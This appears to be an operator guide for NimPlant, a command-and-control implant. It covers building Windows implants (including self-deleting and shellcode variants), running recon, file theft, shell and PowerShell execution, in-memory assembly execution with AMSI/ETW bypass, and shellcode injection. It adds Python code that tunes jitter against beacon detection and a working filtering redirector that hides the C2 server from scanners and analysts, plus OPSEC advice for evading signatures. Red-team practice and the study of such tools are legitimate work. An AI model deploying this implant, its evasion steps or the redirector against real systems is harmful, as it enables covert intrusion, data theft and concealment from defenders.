NimPlant
NimPlant is a lightweight first-stage command-and-control (C2) implant written in Nim, driven by a Python team server. It supports HTTP/HTTPS communication, configurable sleep intervals with jitter, file operations, and in-memory execution of shellcode, .NET assemblies and BOFs.
DISCLAIMER: This tool is intended for authorized security testing and red team engagements only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. Always obtain written authorization before conducting any offensive security operations.
Installation
Server Setup
# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant
# Install Python dependencies for the server
pip install -r server/requirements.txt
# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
# Install the MinGW cross-compiler used to build Windows implants from Linux
sudo apt install mingw-w64
# Install the Nim packages the implant needs (the complete list is in the upstream README)
nimble install -y winim nimcrypto zippy
Compile the Implant
# Edit configuration before compiling; the implant is built from these values
nano config.toml
# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"                   # management API and web UI; keep this port firewalled
port = 31337

[listener]
type = "HTTPS"                   # "HTTP" or "HTTPS"
sslCertPath = "/path/to/server.crt"
sslKeyPath = "/path/to/server.key"
hostname = "cdn.example.com"     # domain the implant calls back to (your redirector)
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"

[nimplant]
riskyMode = false                # compiles in the noisy commands (shell, powershell, execute-assembly, shinject)
sleepMask = false                # encrypt the implant in memory while it sleeps
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant as a Windows EXE (cross-compilation from Linux is automatic via mingw)
python3 NimPlant.py compile exe
# EXE that deletes itself from disk after launch
python3 NimPlant.py compile exe-selfdelete
# Compile as DLL
python3 NimPlant.py compile dll
# Compile as raw shellcode (via sRDI)
python3 NimPlant.py compile raw
# Build every format at once
python3 NimPlant.py compile all
Server Operations
Starting the Server
# Start the NimPlant C2 server
python3 NimPlant.py server
# The listener binds to the [listener] ip:port from config.toml;
# the management API and web UI bind to the [server] ip:port.
# Only the listener should be reachable from the target network (through a redirector).
Managing Implants
# In the NimPlant server console:
# Show available commands
nimplant> help
# List active implants
nimplant> list
# Interact with a specific implant
nimplant> select <implant-id>
# Kill the selected implant
nimplant> kill
Commands
Reconnaissance
# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env
# Host survey helpers built into the implant (AV products, domain, local administrators)
nimplant> getAv
nimplant> getDom
nimplant> getLocalAdm
# List running processes
nimplant> ps
# Get current working directory
nimplant> pwd
# List directory contents
nimplant> ls C:\Users
File Operations
# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe
# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt
# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt
# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir
# Remove a file
nimplant> rm C:\Windows\Temp\file.exe
# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt
# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt
Execution
# Run a command through cmd.exe (requires riskyMode; spawns a child process that EDR will see)
nimplant> shell net user
# Run a program directly, without cmd.exe
nimplant> run C:\Windows\System32\ipconfig.exe /all
# Run a PowerShell command (requires riskyMode)
nimplant> powershell Get-Process
# Execute a .NET assembly in memory (requires riskyMode); the two flags patch AMSI and block ETW for this run only
nimplant> execute-assembly BYPASSAMSI=1 BLOCKETW=1 /path/to/assembly.exe arg1 arg2
# Execute a Beacon Object File (BOF) in memory
nimplant> inline-execute /path/to/object.o entrypoint [args]
# Inject shellcode into a process (requires riskyMode)
nimplant> shinject <pid> /path/to/shellcode.bin
Network Operations
# NimPlant has no built-in netstat, port forwarding or SOCKS proxy; use native tooling through the implant
nimplant> shell netstat -ano
# Fetch a web page or a file from the target's network position
nimplant> curl http://10.0.0.10/
nimplant> wget http://10.0.0.10/file.bin C:\Windows\Temp\file.bin
Sleep and Communication
# Change sleep interval (seconds); jitter (percent) is an optional second argument
nimplant> sleep 30
# Sleep 30 seconds with 40% jitter
nimplant> sleep 30 40
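How sleep and jitter play against beacon hunting, as an added Python example (not NimPlant's own code): it simulates check-in times for the settings above and scores the resulting intervals the way network beacon detectors do. It assumes jitter is applied symmetrically, each sleep drawn uniformly from base ± jitter percent; verify that against the implant source for your version, because an asymmetric formula shifts the mean.

```python
import random
import statistics


def jittered_sleep(base_seconds: float, jitter_pct: int, rng: random.Random) -> float:
    """One sleep interval. Assumption: jitter is symmetric, so the value is drawn
    uniformly from [base*(1-j), base*(1+j)] with j = jitter_pct/100."""
    j = jitter_pct / 100.0
    return base_seconds * rng.uniform(1.0 - j, 1.0 + j)


def checkin_schedule(base_seconds: float, jitter_pct: int, count: int, seed: int = 0) -> list[float]:
    """Simulated check-in timestamps (seconds since the first beacon)."""
    rng = random.Random(seed)
    t, times = 0.0, []
    for _ in range(count):
        times.append(t)
        t += jittered_sleep(base_seconds, jitter_pct, rng)
    return times


def interval_stats(times: list[float]) -> dict:
    """Summarise the inter-arrival gaps the way a beacon hunter would:
    mean gap, coefficient of variation (stdev/mean), and the share of gaps
    within 10 % of the mean. Low CV plus a high share reads as a regular beacon."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else 0.0
    share = sum(1 for g in gaps if abs(g - mean) <= 0.1 * mean) / len(gaps)
    return {"mean": mean, "cv": cv, "within_10pct": share, "gaps": len(gaps)}


def looks_like_beacon(times: list[float], cv_max: float = 0.15, share_min: float = 0.8) -> bool:
    """Toy detector: flag when gaps are both tightly clustered (low CV) and mostly
    near the mean (high share). Thresholds are illustrative, not from any product."""
    s = interval_stats(times)
    return s["cv"] < cv_max and s["within_10pct"] >= share_min


if __name__ == "__main__":
    for jitter in (0, 20, 40):
        times = checkin_schedule(30, jitter, 200, seed=1)
        s = interval_stats(times)
        print(f"sleep 30 jitter {jitter:>2}%: mean={s['mean']:.1f}s cv={s['cv']:.3f} "
              f"within10%={s['within_10pct']:.2f} flagged={looks_like_beacon(times)}")
```

With jitter 0 every gap is exactly 30 s and the schedule is flagged; at 20 % the CV alone stays under the threshold but only about half the gaps sit within 10 % of the mean, which is why the share criterion matters; at 40 % both measures clear. Jitter spreads the intervals, it does not hide the mean, so a long capture still reveals the base sleep.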
HTTPS Communication
# Self-signed certificate for lab use only. For engagements, use a domain you control with a
# CA-issued certificate (e.g. Let's Encrypt) on the redirector; a self-signed cert with a
# third party's CN is a tell, not camouflage.
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
-days 365 -nodes -subj "/CN=cdn.example.com"
# Point the listener at the key pair in config.toml
[listener]
type = "HTTPS"
sslCertPath = "/path/to/server.crt"
sslKeyPath = "/path/to/server.key"
OPSEC Considerations
# NimPlant OPSEC features:
# - AES-encrypted task and result traffic (key negotiated at registration), on top of HTTPS
# - Configurable sleep with jitter so check-ins do not form a regular beacon
# - Kill date so the implant exits after the engagement window
# - Configurable user-agent and callback paths to blend with normal traffic
# - Optional sleep mask that encrypts the implant in memory while it sleeps
# - riskyMode off by default keeps the noisy commands out of the build
# Recommended practices:
# 1. Use a domain you control with a CA-issued HTTPS certificate; never spoof a third party's CN
# 2. Set appropriate sleep times (30-60s with 20-30% jitter for stealth)
# 3. Use redirectors between implant and C2 server; only the listener paths should reach the team server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries and callback paths to avoid signature detection
# 6. Keep the management port ([server] in config.toml) off the internet
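A minimal filtering redirector for practice 3, as an added Python example that is not part of NimPlant: it forwards a request to the team server only when both the URI and the User-Agent match the implant profile, and serves a bland decoy page to everything else (scanners, sandboxes, analysts who fetch the URL by hand). The paths and User-Agent are the ones from the config.toml above; the upstream address 10.0.0.5:8080 is hypothetical and stands for a NimPlant HTTP listener reached over a private link.

```python
import ssl
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Profile values: these must equal registerPath/taskPath/resultPath and userAgent in config.toml.
C2_PATHS = {"/api/register", "/api/task", "/api/result"}
C2_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Hypothetical team-server listener, reached over a VPN or SSH tunnel, never directly from the internet.
C2_UPSTREAM = "http://10.0.0.5:8080"
DECOY_BODY = b"<html><body><h1>It works!</h1></body></html>\n"


def classify(path: str, user_agent: str,
             paths: set[str] = C2_PATHS, ua: str = C2_USER_AGENT) -> str:
    """'forward' when both the URI (query string ignored) and the User-Agent match
    the implant profile, 'decoy' for everything else."""
    base = path.split("?", 1)[0]
    return "forward" if base in paths and user_agent == ua else "decoy"


class Redirector(BaseHTTPRequestHandler):
    def _serve(self) -> None:
        ua = self.headers.get("User-Agent", "")
        if classify(self.path, ua) == "decoy":
            self._reply(200, DECOY_BODY, "text/html")
            return
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length) if length else None
        req = urllib.request.Request(
            C2_UPSTREAM + self.path, data=body, method=self.command,
            headers={"User-Agent": ua,
                     "Content-Type": self.headers.get("Content-Type", "application/octet-stream")})
        try:
            with urllib.request.urlopen(req, timeout=30) as resp:
                self._reply(resp.status, resp.read(),
                            resp.headers.get("Content-Type", "application/octet-stream"))
        except urllib.error.HTTPError as e:      # relay 4xx/5xx from the team server unchanged
            self._reply(e.code, e.read(), "text/plain")
        except (urllib.error.URLError, OSError):  # upstream down: look like a broken site, not a C2
            self._reply(502, b"Bad Gateway\n", "text/plain")

    def _reply(self, status: int, body: bytes, ctype: str) -> None:
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = do_POST = _serve

    def version_string(self) -> str:   # hide the "BaseHTTP/x Python/y" Server header
        return "nginx"

    def log_message(self, fmt, *args):  # keep an audit trail in a file instead of stderr
        with open("redirector.log", "a") as f:
            f.write(f"{self.client_address[0]} {fmt % args}\n")


if __name__ == "__main__":
    httpd = ThreadingHTTPServer(("0.0.0.0", 443), Redirector)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain("server.crt", "server.key")   # the certificate generated in the HTTPS section
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()
```

In production the same rule is usually expressed as nginx `location` / `if ($http_user_agent ...)` blocks or Apache mod_rewrite rules in front of the team server; the point is identical: nothing that does not look exactly like the implant ever reaches the C2 port, and the team server's own fingerprint (headers, error pages, web UI) is never exposed.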
Evasion Configuration
# Hardened config.toml values. There is no separate [evasion] section: the build-time knobs live
# under [nimplant], and AMSI/ETW patching is chosen per invocation (execute-assembly BYPASSAMSI=1 BLOCKETW=1)
[nimplant]
riskyMode = false
sleepMask = true
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Logging
# Server logs all interactions
# Logs stored in: server/logs/
# View engagement log
cat server/logs/nimplant.log
# Each implant session has its own log
ls server/logs/sessions/
Cleanup
# Terminate each implant from the server console
nimplant> select <id>
nimplant> kill
# Remove dropped artifacts before killing. Windows locks a running EXE, so `shell del` on the implant's
# own binary fails; either build it with `compile exe-selfdelete` or delete the file after the kill
# using other access. Only non-running artifacts can be removed from the implant's shell:
nimplant> shell del C:\Windows\Temp\file.exe
nimplant> kill